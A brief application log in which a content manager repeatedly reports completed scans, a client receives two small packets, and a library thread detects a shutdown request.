LocalContentManager: Scan completed
LocalContentManager: Scan completed
LocalContentManager: Scan completed
LocalContentManager: Scan completed
LocalContentManager: Scan completed
LocalContentManager: Scan completed
LocalContentManager: Scan completed
LocalContentManager: Scan completed
client: packet 8 received, len 2
client: packet 8 received, len 2
library_thread: shutdown request detected